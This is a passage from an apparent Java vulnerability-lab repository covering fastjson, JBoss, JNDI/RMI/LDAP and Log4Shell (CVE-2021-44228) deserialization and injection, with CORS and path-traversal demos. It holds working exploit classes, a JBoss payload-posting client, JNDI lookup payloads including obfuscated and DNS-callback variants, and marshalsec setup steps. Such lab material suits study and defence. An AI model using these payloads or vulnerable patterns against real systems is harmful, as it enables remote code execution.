17 |         System.out.println(jsonObject1);
18 |     }
19 |
20 |
21 | }
22 |
23 | // Target class for the "@type" value above; its no-arg constructor starts "calc".
24 | class Test {
25 |     public String cmd;
26 |
27 |     Test() {
28 |         try {
29 |
Runtime.getRuntime().exec("calc");
30 |         } catch (IOException e) {
31 |             e.printStackTrace();
32 |         }
33 |     }
34 |
35 |     public Test(String cmd) { // stores cmd only; unlike the no-arg constructor it starts no process
36 |         this.cmd = cmd;
37 |     }
38 |
39 |     public String getCmd() {
40 |         return cmd;
41 |     }
42 |
43 |     public void setCmd(String cmd) { // prints a marker on every call, then stores cmd
44 |         System.out.println("setCmd...");
45 |         this.cmd = cmd;
46 |     }
47 | }
48 |
--------------------------------------------------------------------------------
/fastjson/src/test/java/test/FastjsonTest.java:
--------------------------------------------------------------------------------
 1 | package test;
 2 |
 3 | import java.io.IOException;
 4 | import com.alibaba.fastjson.JSON;
 5 | // Serializes a POJO to JSON and parses it back into POJO.class, printing both results.
 6 | public class FastjsonTest {
 7 |     public static void main(String[] args) {
 8 |         POJO calc = new POJO("calc"); // this constructor itself runs its argument as a command
 9 |         String s = JSON.toJSONString(calc);
10 |         System.out.println(s);
11 |         POJO jsonObject = JSON.parseObject(s, POJO.class); // NOTE(review): presumably fastjson builds the instance through the no-arg constructor, which starts "calc" - confirm
12 |         System.out.println(jsonObject.toString()); // POJO declares no toString(), so this prints the default Object form
13 |     }
14 |
15 |
16 | }
17 | // Demo bean whose two constructors both start a process as a side effect of construction.
18 | class POJO {
19 |     public String cmd;
20 |
21 |     POJO(){
22 |         try {
23 |             Runtime.getRuntime().exec("calc");
24 |         } catch (IOException e) {
25 |             e.printStackTrace();
26 |         }
27 |     }
28 |
29 |     public POJO(String cmd) {
30 |         this.cmd = cmd;
31 |         try {
32 |             Runtime.getRuntime().exec(this.cmd); // runs the caller-supplied string as an OS command; the only caller in this file passes the constant "calc"
33 |         } catch (IOException e) {
34 |             e.printStackTrace();
35 |         }
36 |     }
37 | }
38 |
-------------------------------------------------------------------------------- /jboss/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | jboss 13 | 14 | 15 | commons-collections 16 | commons-collections 17 | 3.1 18 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /jboss/src/main/java/com/jboss/main/Test.java: -------------------------------------------------------------------------------- 1 | package com.jboss.main; 2 | 3 | import java.io.File; 4 | import
java.io.FileOutputStream; 5 | 6 | public class Test { 7 | public Test() { 8 | } 9 | 10 | public static void main(String[] args) { 11 | Payload payload = new Payload(); 12 | // String url = args[0]; 13 | String command = "echo test_for_jbossvul_12149"; 14 | String url = "http://192.168.116.132:8080"; 15 | try { 16 | byte[] win = payload.upload("windows"); 17 | byte[] lin = payload.upload("Linux"); 18 | doPost.DoPost(url, win); 19 | doPost.DoPost(url, lin); 20 | byte[] winpayload = payload.PayloadGeneration(command, "windows"); 21 | byte[] linpayload = payload.PayloadGeneration(command, "linux"); 22 | FileOutputStream linux = new FileOutputStream(new File("linux")); 23 | linux.write(linpayload); 24 | linux.close(); 25 | String result = doPost.DoPost(url, winpayload); 26 | String result2 = doPost.DoPost(url, linpayload); 27 | System.out.println(result + result2.trim()); 28 | } catch (Exception var9) { 29 | var9.printStackTrace(); 30 | } 31 | 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /jboss/target/classes/META-INF/jboss.kotlin_module: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/Payload.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/Payload.class -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/Test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/Test.class -------------------------------------------------------------------------------- 
/jboss/target/classes/com/jboss/main/doPost.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/doPost.class -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/main$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/main$1.class -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/main$2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/main$2.class -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/main$3.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/main$3.class -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/main.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/main.class -------------------------------------------------------------------------------- /jenkins/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | jenkins 13 | 
14 | 15 | com.r17a 16 | weblogic 17 | 1.0-SNAPSHOT 18 | compile 19 | 20 | 21 | commons-collections 22 | commons-collections 23 | 3.2.2 24 | compile 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /jndi/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | jndi 13 | 14 | 15 | 16 | org.apache.maven.plugins 17 | maven-compiler-plugin 18 | 19 | 7 20 | 7 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | com.unboundid 31 | unboundid-ldapsdk 32 | 3.1.1 33 | compile 34 | 35 | 36 | javassist 37 | javassist 38 | 3.12.1.GA 39 | compile 40 | 41 | 42 | javassist 43 | javassist 44 | 3.12.1.GA 45 | compile 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/JndiAndDns.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi; 2 | 3 | import javax.naming.Context; 4 | import javax.naming.NamingException; 5 | import javax.naming.directory.Attributes; 6 | import javax.naming.directory.DirContext; 7 | import javax.naming.directory.InitialDirContext; 8 | import java.util.Properties; 9 | 10 | public class JndiAndDns { 11 | public static void main(String[] args) { 12 | // 创建环境变量 13 | Properties env = new Properties(); 14 | // JNDI初始化工厂类 15 | env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.dns.DnsContextFactory"); 16 | // JNDI提供服务的URL 17 | env.put(Context.PROVIDER_URL, "dns://8.8.8.8"); 18 | try { 19 | // 创建JNDI目录服务对象 20 | DirContext context = new InitialDirContext(env); 21 | 22 | // 获取DNS解析记录测试 23 | Attributes attrs1 = context.getAttributes("baidu.com", new String[]{"A"}); 24 | Attributes attrs2 = context.getAttributes("qq.com", new String[]{"A"}); 25 | 26 | System.out.println(attrs1); 27 | System.out.println(attrs2); 28 | } catch (NamingException e) { 29 | 
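e.printStackTrace(); 30 | } 31 | } 32 | }
--------------------------------------------------------------------------------
/jndi/src/main/java/com/r17a/jndi/JndiAndLdap.java:
--------------------------------------------------------------------------------
package com.r17a.jndi;

import com.r17a.jndi.ldap.CalcTest;

import javax.naming.Context;
import javax.naming.NamingException;
import javax.naming.directory.DirContext;
import javax.naming.directory.InitialDirContext;
import java.io.IOException;
import java.util.Hashtable;

/**
 * Lab client for the JNDI-over-LDAP lookup case: connects to an LDAP server on localhost,
 * looks up one entry and casts the result to {@link CalcTest}.
 *
 * <p>Security note: this class sets {@code com.sun.jndi.ldap.object.trustURLCodebase} to
 * {@code true} on purpose. With that property enabled the JNDI LDAP provider is allowed to load
 * classes from a codebase URL named by the directory entry, so the party that controls the LDAP
 * server decides what code runs in this JVM. Keep the property at its default outside an isolated
 * lab, and when reviewing real code treat any lookup name or provider URL built from untrusted
 * input as the thing to find and remove.
 */
public class JndiAndLdap {

    /**
     * Runs the lookup against {@code ldap://localhost:1389} and invokes the returned object.
     *
     * @param args unused
     * @throws NamingException if the context cannot be created, the lookup fails, or closing fails
     * @throws IOException     propagated from {@code CalcTest.calc()}
     */
    public static void main(String[] args) throws NamingException, IOException {
        // Lab-only switch: it affects every LDAP lookup made by this JVM, not just the one below.
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

        Hashtable<String, String> env = new Hashtable<>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        env.put(Context.PROVIDER_URL, "ldap://localhost:1389");

        DirContext ctx = new InitialDirContext(env);
        try {
            // The cast only succeeds when the server returns a CalcTest; anything else is a
            // ClassCastException, but the returned object has already been materialised by then.
            CalcTest localObj = (CalcTest) ctx.lookup("cn=foo,dc=example,dc=com");
            System.out.println(localObj.toString());
            localObj.calc();
        } finally {
            // The context holds a connection to the server; release it even when lookup throws.
            ctx.close();
        }
    }
}
--------------------------------------------------------------------------------
/jndi/src/main/java/com/r17a/jndi/JndiAndRmi.java:
--------------------------------------------------------------------------------
1 | package com.r17a.jndi; 2 | 3 | import com.r17a.jndi.rmi.Calc; 4 | import com.r17a.jndi.rmi.ICalc; 5 | 6 | import javax.naming.Context; 7 | import javax.naming.InitialContext; 8 | import javax.naming.NamingException; 9 | import java.io.IOException; 10 | import java.rmi.RemoteException; 11 | import java.util.Hashtable; 12 | 13 | public class JndiAndRmi { 14 | public static void main(String[] args) { 15 | try { 16 | test1(); 17 | } catch (Exception e) { 18 | e.printStackTrace(); 19 | } 20 | } 21 | 22 | public static void test1(){ 23 | String uri = "rmi://localhost:1099/calculate"; 24 | try { 25 | Context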
ctx = new InitialContext(); 26 | ICalc icalc = (ICalc) ctx.lookup(uri); 27 | icalc.calc(); 28 | } catch (NamingException e) { 29 | e.printStackTrace(); 30 | } catch (IOException e) { 31 | e.printStackTrace(); 32 | } 33 | } 34 | 35 | public static void test2() throws NamingException, RemoteException { 36 | Hashtable env = new Hashtable(); 37 | env.put(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.rmi.registry.RegistryContextFactory"); 38 | env.put(Context.PROVIDER_URL,"rmi://127.0.0.1:1099"); 39 | Context ctx = new InitialContext(env); 40 | 41 | //将名称refObj与一个对象绑定,这里底层也是调用的rmi的registry去绑定 42 | ctx.bind("refObj", new Calc()); 43 | 44 | //通过名称查找对象 45 | ctx.lookup("refObj"); 46 | } 47 | } -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/ldap/CalcTest.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.ldap; 2 | 3 | import java.io.IOException; 4 | import java.io.Serializable; 5 | 6 | //public class CalcTest implements ObjectFactory { 7 | // 8 | // public CalcTest() throws IOException { 9 | // Runtime.getRuntime().exec("calc"); 10 | // } 11 | // 12 | // public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception { 13 | // return new Integer(1); 14 | // } 15 | //} 16 | 17 | public class CalcTest implements Serializable { 18 | 19 | private static final long serialVersionUID = -3858195503738032307L; 20 | 21 | public CalcTest() throws IOException { 22 | Runtime.getRuntime().exec("calc"); 23 | } 24 | 25 | public void calc() throws IOException { 26 | Runtime.getRuntime().exec("calc"); 27 | } 28 | } -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/ldap/LdapSerClient.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.ldap; 2 | 3 | import javax.naming.Context; 4 | import 
javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | import java.io.IOException; 7 | 8 | public class LdapSerClient { 9 | public static void main(String[] args) throws NamingException, IOException { 10 | System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true"); 11 | Context ctx = new InitialContext(); 12 | CalcTest object = (CalcTest) ctx.lookup("ldap://127.0.0.1:1389/cn=foo,dc=example,dc=com"); 13 | System.out.println(object.toString()); 14 | object.calc(); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/ldap/SerObject.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.ldap; 2 | 3 | import java.io.FileOutputStream; 4 | import java.io.IOException; 5 | import java.io.ObjectOutputStream; 6 | 7 | public class SerObject { 8 | public static void main(String[] args) throws IOException { 9 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("E:\\ser.txt")); 10 | CalcTest CalcTest = new CalcTest(); 11 | objectOutputStream.writeObject(CalcTest); 12 | } 13 | } -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/rmi/Calc.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.rmi; 2 | 3 | import java.io.IOException; 4 | import java.rmi.RemoteException; 5 | import java.rmi.server.UnicastRemoteObject; 6 | 7 | /** 8 | * 服务器端实现远程接口。 9 | * 必须继承UnicastRemoteObject,以允许JVM创建远程的存根/代理。 10 | */ 11 | public class Calc extends UnicastRemoteObject implements ICalc { 12 | 13 | public Calc() throws RemoteException { 14 | } 15 | 16 | 17 | public void calc() throws IOException { 18 | Runtime.getRuntime().exec("calc"); 19 | } 20 | } -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/rmi/ICalc.java: 
-------------------------------------------------------------------------------- 1 | package com.r17a.jndi.rmi; 2 | 3 | import java.io.IOException; 4 | import java.rmi.Remote; 5 | 6 | /** 7 | * 必须继承Remote接口。 8 | * 所有参数和返回类型必须序列化(因为要网络传输)。 9 | * 任意远程对象都必须实现此接口。 10 | * 只有远程接口中指定的方法可以被调用。 11 | */ 12 | public interface ICalc extends Remote { 13 | void calc() throws IOException; 14 | } -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/rmi/RmiClient.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.rmi; 2 | 3 | import java.io.IOException; 4 | import java.rmi.NotBoundException; 5 | import java.rmi.RemoteException; 6 | import java.rmi.registry.LocateRegistry; 7 | import java.rmi.registry.Registry; 8 | 9 | 10 | public class RmiClient { 11 | public static void main(String[] args) { 12 | try { 13 | /***********方法1***************************/ 14 | // 如果RMI Registry就在本地机器上,URL就是:rmi://localhost:1099/hello 15 | // 否则,URL就是:rmi://RMIService_IP:1099/hello 16 | Registry registry = LocateRegistry.getRegistry("127.0.0.1",1999); 17 | // 从Registry中检索远程对象的存根/代理 18 | // 查找名为calculate的服务,这里必须是Icalc不能是Calc 19 | ICalc calculate = (ICalc) registry.lookup("calculate"); 20 | /***********方法2***************************/ 21 | // Icalc calculate = (Icalc) Naming.lookup("rmi://localhost:1999/calculate"); 22 | // 调用远程对象的方法 23 | calculate.calc(); 24 | } catch (RemoteException e) { 25 | e.printStackTrace(); 26 | } catch (NotBoundException e) { 27 | e.printStackTrace(); 28 | } catch (IOException e) { 29 | e.printStackTrace(); 30 | } 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/rmi/RmiRegisterServer.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.rmi; 2 | 3 | import java.rmi.AlreadyBoundException; 4 | import 
java.rmi.RemoteException; 5 | import java.rmi.registry.LocateRegistry; 6 | import java.rmi.registry.Registry; 7 | 8 | /** 9 | * 注册远程对象,向客户端提供远程对象服务。 10 | * 远程对象是在远程服务上创建的,你无法确切地知道远程服务器上的对象的名称, 11 | * 但是,将远程对象注册到RMI Registry之后, 12 | * 客户端就可以通过RMI Registry请求到该远程服务对象的stub, 13 | * 利用stub代理就可以访问远程服务对象了。 14 | */ 15 | public class RmiRegisterServer{ 16 | private RmiRegisterServer(String port) throws RemoteException { 17 | Registry registry = LocateRegistry.createRegistry(Integer.parseInt(port)); 18 | try { 19 | registry.bind("calculate",new Calc()); 20 | } catch (AlreadyBoundException e) { 21 | e.printStackTrace(); 22 | } 23 | } 24 | 25 | public static void main(String[] args) { 26 | try { 27 | String port = "1099"; 28 | new RmiRegisterServer(port); 29 | System.out.println("RMI服务启动成功...\n"); 30 | System.out.println("Listening on localhost:"+ port +"..."); 31 | } catch (RemoteException e) { 32 | e.printStackTrace(); 33 | } 34 | } 35 | } -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/JndiAndDns.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/JndiAndDns.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/JndiAndLdap.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/JndiAndLdap.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/JndiAndRmi.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/JndiAndRmi.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/CalcTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/CalcTest.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/LdapRefServer$OperationInterceptor.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/LdapRefServer$OperationInterceptor.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/LdapRefServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/LdapRefServer.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/LdapSerClient.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/LdapSerClient.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/LdapSerServer$OperationInterceptor.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/LdapSerServer$OperationInterceptor.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/LdapSerServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/LdapSerServer.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/SerObject.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/SerObject.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/rmi/Calc.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/rmi/Calc.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/rmi/ICalc.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/rmi/ICalc.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/rmi/RmiClient.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/rmi/RmiClient.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/rmi/RmiRegisterServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/rmi/RmiRegisterServer.class -------------------------------------------------------------------------------- /log4j/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | log4j 13 | 14 | 15 | 8 16 | 8 17 | 18 | 19 | 20 | 21 | org.apache.logging.log4j 22 | log4j-core 23 | 2.10.0 24 | 25 | 26 | 27 | org.apache.logging.log4j 28 | log4j-api 29 | 2.10.0 30 | 31 | 32 | log4j 33 | log4j 34 | 1.2.17 35 | compile 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /log4j/src/main/java/com/r17a/log4j2/cve_2021_44228/EXP.java: -------------------------------------------------------------------------------- 1 | package com.r17a.log4j2.cve_2021_44228; 2 | 3 | import javax.naming.Context; 4 | import javax.naming.Name; 5 | import javax.naming.spi.ObjectFactory; 6 | import java.io.IOException; 7 | import java.util.Hashtable; 8 | 9 | // TODO 10 | // 1、javac EXP.java(记得先把`package com.r17a.log4j2;`删除) 11 | // 2、在上述文件目录下开启python3 -m http.server 12 | // 3、利用marshalsec工具开启ldap或rmi服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8000/#test 1389 13 | // 也可直接用JNDI_EXPLOIT工具ß 14 | public class EXP implements ObjectFactory { 15 | 16 | public EXP() throws IOException { 17 | Runtime.getRuntime().exec("open /System/Applications/Calculator.app"); 18 | Runtime.getRuntime().exec("ping 
*.ceye.io"); 19 | } 20 | 21 | // 实现ObjectFactory防止cast异常,return一个integer即可 22 | public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception { 23 | return new Integer(1); 24 | } 25 | } 26 | 27 | 28 | -------------------------------------------------------------------------------- /log4j/src/main/java/com/r17a/log4j2/cve_2021_44228/RCE_20211209.java: -------------------------------------------------------------------------------- 1 | package com.r17a.log4j2.cve_2021_44228; 2 | 3 | 4 | import org.apache.log4j.PropertyConfigurator; 5 | import org.apache.logging.log4j.LogManager; 6 | import org.apache.logging.log4j.Logger; 7 | 8 | public class RCE_20211209 { 9 | public static final Logger LOGGER = LogManager.getLogger(RCE_20211209.class); 10 | public static void main(String[] args) { 11 | PropertyConfigurator.configure( "./log4j/src/main/resources/log4j.properties" ); 12 | System.out.println("test for log4j2"); 13 | LOGGER.error("${jndi:ldap://localhost:1389/cn=foo,dc=example,dc=com}"); 14 | // LOGGER.error("${jndi:ldap://localhost:1389/exp}"); 15 | // LOGGER.error("${jndi:ldap://127.0.0.1:1389/tpw9nj}"); 16 | // LOGGER.error("${jndi:rmi://pb8397.dnslog.cn/123}"); 17 | // LOGGER.error("${${lower:jndi}:${lower:rmi}://2.test.0ks3b9.ceye.io/poc} "); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /log4j/src/main/resources/log4j.properties: -------------------------------------------------------------------------------- 1 | ### 设置### 2 | log4j.rootLogger = debug,stdout,D,E 3 | 4 | ### 输出信息到控制抬 ### 5 | log4j.appender.stdout = org.apache.log4j.ConsoleAppender 6 | log4j.appender.stdout.Target = System.out 7 | log4j.appender.stdout.layout = org.apache.log4j.PatternLayout 8 | log4j.appender.stdout.layout.ConversionPattern = [%-5p] %d{yyyy-MM-dd HH:mm:ss,SSS} method:%l%n%m%n 9 | 10 | ### 输出DEBUG 级别以上的日志到=E://logs/error.log ### 11 | log4j.appender.D = 
org.apache.log4j.DailyRollingFileAppender 12 | log4j.appender.D.File = /Users/R17a/logs/log.log 13 | log4j.appender.D.Append = true 14 | log4j.appender.D.Threshold = DEBUG 15 | log4j.appender.D.layout = org.apache.log4j.PatternLayout 16 | log4j.appender.D.layout.ConversionPattern = %-d{yyyy-MM-dd HH:mm:ss} [ %t:%r ] - [ %p ] %m%n 17 | 18 | ### 输出ERROR 级别以上的日志到=E://logs/error.log ### 19 | log4j.appender.E = org.apache.log4j.DailyRollingFileAppender 20 | log4j.appender.E.File =/Users/R17a/logs/error.log 21 | log4j.appender.E.Append = true 22 | log4j.appender.E.Threshold = ERROR 23 | log4j.appender.E.layout = org.apache.log4j.PatternLayout 24 | log4j.appender.E.layout.ConversionPattern = %-d{yyyy-MM-dd HH:mm:ss} [ %t:%r ] - [ %p ] %m%n -------------------------------------------------------------------------------- /log4j/target/classes/com/r17a/log4j2/EXP.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/log4j/target/classes/com/r17a/log4j2/EXP.class -------------------------------------------------------------------------------- /log4j/target/classes/com/r17a/log4j2/RCE_20211209.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/log4j/target/classes/com/r17a/log4j2/RCE_20211209.class -------------------------------------------------------------------------------- /log4j/target/classes/log4j.properties: -------------------------------------------------------------------------------- 1 | ### 设置### 2 | log4j.rootLogger = debug,stdout,D,E 3 | 4 | ### 输出信息到控制抬 ### 5 | log4j.appender.stdout = org.apache.log4j.ConsoleAppender 6 | log4j.appender.stdout.Target = System.out 7 | log4j.appender.stdout.layout = org.apache.log4j.PatternLayout 8 | log4j.appender.stdout.layout.ConversionPattern = [%-5p] 
%d{yyyy-MM-dd HH:mm:ss,SSS} method:%l%n%m%n 9 | 10 | ### 输出DEBUG 级别以上的日志到=E://logs/error.log ### 11 | log4j.appender.D = org.apache.log4j.DailyRollingFileAppender 12 | log4j.appender.D.File = /Users/R17a/logs/log.log 13 | log4j.appender.D.Append = true 14 | log4j.appender.D.Threshold = DEBUG 15 | log4j.appender.D.layout = org.apache.log4j.PatternLayout 16 | log4j.appender.D.layout.ConversionPattern = %-d{yyyy-MM-dd HH:mm:ss} [ %t:%r ] - [ %p ] %m%n 17 | 18 | ### 输出ERROR 级别以上的日志到=E://logs/error.log ### 19 | log4j.appender.E = org.apache.log4j.DailyRollingFileAppender 20 | log4j.appender.E.File =/Users/R17a/logs/error.log 21 | log4j.appender.E.Append = true 22 | log4j.appender.E.Threshold = ERROR 23 | log4j.appender.E.layout = org.apache.log4j.PatternLayout 24 | log4j.appender.E.layout.ConversionPattern = %-d{yyyy-MM-dd HH:mm:ss} [ %t:%r ] - [ %p ] %m%n -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/cors/Cors.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.cors; 2 | 3 | import java.util.HashMap; 4 | 5 | public class Cors { 6 | /** 7 | * 漏洞模拟 8 | * https://portswigger.net/web-security/cors 9 | * */ 10 | public static void main(String[] args) { 11 | Cors response = new Cors(); 12 | // 漏洞 13 | response.setResponseHeader("Access-Control-Allow-Origin", "*"); 14 | response.setResponseHeader("Access-Control-Allow-Origin", null); 15 | // 白名单修复 16 | String[] authdomains = new String[]{"a.com.cn"}; 17 | response.setResponseHeader("Access-Control-Allow-Origin", authdomains); 18 | } 19 | 20 | public void setResponseHeader(String header, Object value) { 21 | HashMap headers = new HashMap(10); 22 | headers.put(header, value); 23 | } 24 | 25 | } 26 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/file/FileDelete.java: 
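--------------------------------------------------------------------------------
package com.r17a.commonvuln.file;

import java.io.File;
import java.io.IOException;
import java.util.Locale;

/**
 * Arbitrary-file-deletion demo with an unfixed and a fixed variant.
 *
 * <p>The sample input in {@link #main(String[])} is a {@code ../} traversal path that ends in
 * {@code .png}. An extension allowlist on its own accepts that name, so the fixed variant also
 * resolves the target and checks that it still lies inside the image directory.
 */
public class FileDelete {

    /** Directory that holds the files a caller may delete. */
    private static final String IMAGE_DIR = "./owasp/src/main/resources/imgs";

    /** Lower-case extensions, including the dot, that may be deleted. */
    private static final String[] ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"};

    public static void main(String[] args) {
        String fileName = "../../../../../../../../../../../../../../../../111.png";
        FileDelete fileDelete = new FileDelete();
        // Unfixed variant, kept for comparison:
//        fileDelete.fileDeleteNoFix(fileName);
        fileDelete.fileDeleteWithFix(fileName);
    }

    /**
     * Unfixed baseline of the demo: joins {@code fileName} onto the image directory and deletes
     * whatever that resolves to. Nothing constrains the name, so {@code ../} segments leave the
     * directory. Kept as-is on purpose; do not copy.
     *
     * @param fileName caller-supplied file name
     * @return {@code true} if a file existed and was deleted
     */
    private Boolean fileDeleteNoFix(String fileName) {
        File file = new File(IMAGE_DIR, fileName);
        if (file.exists() && file.delete()) {
            System.out.println("Delete success!");
            return true;
        }
        System.out.println("Delete fail!");
        return false;
    }

    /**
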